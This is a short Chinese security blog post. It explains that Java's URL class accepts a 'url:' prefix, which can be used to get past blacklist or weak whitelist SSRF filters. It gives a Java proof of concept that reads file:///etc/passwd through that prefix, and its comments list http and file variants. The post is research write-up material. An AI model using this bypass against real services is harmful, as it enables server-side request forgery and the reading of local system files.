0x01 前言

首先原作者文章: https://mp.weixin.qq.com/s/SysCJTcYRpV6dj9QfeQYmQ
有这个思考主要是因为看了文章以后觉得核心点就是

  1. js 里面的 new URL("url:xxxxxxx");
  2. 恰巧的是 java  new URL 也可以支持 url:xxxxxxx 这种格式
  4. 那么脑海里面其实第一反应就是如果他是黑名单过滤或是不严谨的白名单过滤那么绕过就有可能性了
  6. 例如下面的例子

0x02 例子

  1. import java.net.URL;
  2. import java.net.URLConnection;
  4. import java.io.BufferedReader;
  5. import java.io.InputStreamReader;
  7. public class SsrfTest2 {
  8.     public static void main(String[] args) {
  9.         try {
  10.             // 漏洞利用点
  11.             // 例如我这里使用了 最前面使用了 url: 最后面使用了 ?1123=fffffff
  12.             // 也是可以正常执行的,所以说 new URL 这个类兼容性也是非常强的
  13.             // 当然这里里面,实际攻击可以改成
  14.             //     url:http://xxxx.com
  15.             //     url:https://xxx.com
  16.             //     url:file:///etc/passwd
  17.             // 都是可以正常识别的
  18.             String url = "url:file:///etc/passwd?1123=fffffff";
  19.             // 实例化url的对象
  20.             URL u = new URL(url);
  21.             System.out.println(u);
  22.             //打开一个URL连接,并运行客户端访问资源。
  23.             URLConnection connection = u.openConnection();
  24.             connection.connect();
  25.             connection.getInputStream();
  27.             StringBuilder response = new StringBuilder();
  28.             //获取url中的资源
  29.             BufferedReader in = new BufferedReader(
  30.                     new InputStreamReader(connection.getInputStream(), "UTF-8"));
  32.             String line;
  33.             while ((line = in.readLine()) != null) {
  34.                 response.append(line);
  35.             }
  36.             in.close();
  38.             System.out.print(response.toString());
  39.         } catch (Exception e) {
  40.             e.printStackTrace();
  41.         }
  42.     }
  43. }

运行结果
image.png